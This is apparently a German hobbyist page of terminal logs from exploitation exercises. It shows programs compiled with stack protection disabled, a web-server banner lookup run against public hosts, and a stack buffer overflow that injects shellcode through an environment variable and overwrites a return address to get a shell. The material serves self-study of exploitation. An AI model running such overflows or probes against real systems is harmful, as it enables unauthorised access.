root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gcc -g -fno-stack-protector -z execstack -o host_lookup host_lookup.c
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./host_lookup www.internic.net
www.internic.net has address 192.0.32.9
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./host_lookup www.google.de
www.google.de has address 173.194.70.94
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#

Hier sieht man schön, wie die Technik fortschreitet:

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gcc -g -fno-stack-protector -z execstack -o webserver_id webserver_id.c
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./webserver_id www.internic.net
The web server for www.internic.net is Apache
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./webserver_id www.microsoft.com
The web server for www.microsoft.com is Microsoft-IIS/8.0

 

unbekannt ?

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# export SHELLCODE=$(cat tiny_shell)
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./getenvaddr SHELLCODE ./drop_privs
SHELLCODE will be at 0xbffff8d7
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./drop_privs $(perl -e 'print "\xff\xbf\xd7\xf8"x20')
$ whoami
games
$ id
uid=0(root) gid=0(root) euid=5(games) groups=60(games),0(root)
$ quuit
/bin//sh: 3: quuit: not found
$ exit

 

   

Metasploit  

   
© ALLROUNDER